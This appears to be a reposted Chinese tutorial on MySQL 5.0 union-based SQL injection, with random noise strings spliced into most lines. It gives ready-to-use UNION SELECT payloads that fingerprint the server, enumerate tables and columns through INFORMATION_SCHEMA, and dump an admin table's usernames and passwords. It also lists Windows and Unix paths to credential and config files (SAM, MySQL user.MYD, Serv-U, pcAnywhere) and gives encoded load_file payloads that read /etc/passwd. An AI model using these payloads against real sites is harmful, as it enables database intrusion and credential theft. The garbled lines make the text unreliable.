mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



" I; j6 _5 i' h; [" ~Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
6 i% ]5 T! `4 x1 S1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
- v1 e5 k3 s9 C! q! m6 P1 ?|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
5 J2 D8 T' x: t5 V2 c
3 f3 y: Z7 N$ _( J/ u|COLUMNS ->存储的字段名表
% f' o( R* h+ u7 P# N1 B4 [) Q|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称
4 v+ |& V- ]% V& R2 f; P. p
. c5 R2 ]! a# R3 h% p5 U9 \& C|—字段：COLUMN_NAME ->该字段的名称

#########################################################################
##
* W+ T3 Y$ g5 T* ~3 D5 W) n
, c# p0 g/ [# V$ D6 `0×001 获取系统信息:
5 t0 q# \8 r% K3 R4 d4 K/ x
union select 1,2,3,4,5,concat
0 `% ~, t, ^' @) C% F(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
6 i& T! l; q# }7 C7 D9 R6 n6 I
/*

@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
$ M' l( {# ~7 G8 `" U4 a8 Y) ydatabase() 当前数据库名称
0 k2 w3 W8 W5 E8 ~0x3c62723e 换行HEX值

& T# _! `1 R* w, V7 [*/

, ^2 t1 b7 |2 z######################################################################
' R+ \4 w/ t' A+ ?2 g
) K8 P8 e, u9 C( E1 a0×002 获取表名

3 `: Q  K) d7 Wunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
. R- F) J" F3 p9 I
7 e( U/ l7 M- F% I4 ~. |( t/*
" K! d! f) C" S9 q2 A) k& [
0x67617264656e 为当前数据库名
3 W. L2 \( t+ h- d& a1 y
% B; d1 n  O1 q, Vgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

6 O! i. H* {  H  Z! X& s7 R7 H0 Z*/
* B: j0 Z( p/ d$ p/ g8 s
5 e3 b& H. y8 n8 M9 M8 K' h######################################################################

+ X- z1 ]. X  A2 x0×003 获取字段
0 o# ~2 w" q9 M' P) ^- C- _* ^
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
6 `5 ~6 a: i6 `information_schema.columns where table_name=0x61646d696e and

3 j: v- Q: v  C7 ~: ?- n& a" a8 q  @
$ {& w% W3 L( etable_schema=0x67617264656e limit 1 /*
; G& u2 c) P* z4 }' c: b8 w0 v- {
$ [0 |) [9 Z+ f7 r; h( A/*
* t6 K$ \" i, k$ C8 Y, B
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
( u1 R& R2 G6 }' D
0x61646d696e ->选择一个表

- o, J4 l/ ~& B$ x. O0x67617264656e ->数据库名
2 {9 U3 j* Z/ v2 _
*/

4 h! I+ ~' y0 a. N#####################################################################
/ {4 a9 v& w# H4 ?- D7 z7 Y* W$ x
0×004 获取数据

union select 1,2,3
3 }3 {% A+ r; B& D,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
7 a+ C" _4 E4 v+ u4 n
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
0 f* l* @* i7 N" g+ G. A9 Y
/*

0x3c62723e 换行符号HEX编码
' a' O+ @6 k% N' y
group_concat 同时获得该字段所有数据

# W8 U3 Q( b. X4 H/ _+ @. K*/
. R0 m' A- F2 P2 V4 j


* f+ \) d  E8 x5 Y* H3 D! p' ^
% w. H2 p. k. R/ f, W# a9 x
: }  U! \' |+ {2 A顺便添加一些mysql注入时非常有用的一些东西
; Z- ?0 z; o: x! I& K7 j
# u9 x1 Q! y% f/ V9 p简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
' u  f+ M) H* K  U# I- R( R6 g
1 n3 ?9 D' b& H: l) h2 h6 ?& [* A1:system_user() 系统用户名
. O1 ~9 E% k; [0 q) ~2:user()        用户名
3:current_user()  当前用户名
9 b+ V/ p) {0 C9 v4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
4 ^! w8 p2 t" }8@datadir     读取数据库路径
" v, a  c5 D8 E9@basedir    MYSQL 安装路径
) N) v) g% b3 v( L' z4 I10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
4 M  O7 Q! E$ @( E# T% G1 JWINDOWS下:
' s+ l7 k4 T1 F3 q  d% }c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
! P2 s2 i0 Y: {7 S, m8 tc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
0 _7 e$ I+ D% i+ |c:/winnt/php.ini
4 P3 A" w/ Z2 g8 h1 [5 ]c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
# B2 O' x: r5 x5 @c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
; v  V$ F8 o/ T' u* R7 ~" Rc:\Program Files\Serv-U\ServUDaemon.ini
! A! G# }  n+ @1 h; ~$ [c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
/ k' n. g: d( t5 @C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
" O% B2 N+ {3 t4 g* G//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
" I/ T- }7 t8 S- W; f0 r3 vc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
. w3 P. `$ y8 @6 i' T  j3 Rd:\APACHE\Apache2\conf\httpd.conf
0 w# e/ p* H9 R- [1 T$ \5 @# BC:\Program Files\mysql\my.ini
' e( ]! c2 f7 P) M5 {" d& cc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
& D1 `, Z9 q# a7 j6 q: w
4 }. M6 l1 G5 \* x# p8 MLUNIX/UNIX下:
( Z% U9 N  q- v0 ?' l/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
. ?% K+ G4 ?5 V* t/ `/etc/httpd/conf/httpd.conf // apache配置文件
  {5 S5 ?$ P( B8 }' d9 D( x/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
! k* F. I) l2 f/ ]/etc/redhat-release //系统版本
/ M! }/ W0 ?6 T, n- H) Q1 z% w! A/etc/issue
  v9 x. v/ J, c/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
4 D0 G  u( J1 h0 k# T/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
# L* D5 V5 E% r5 T, J3 B" N/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
! ~9 Q0 D7 l8 g$ g( G! z/ B; r% j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
8 P: l1 b! h, B# p. B2 x2 K9 w- H8 a) j/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
# w2 T9 S: N" C; C+ k/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
- x- b2 t8 q8 C# l2 w上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.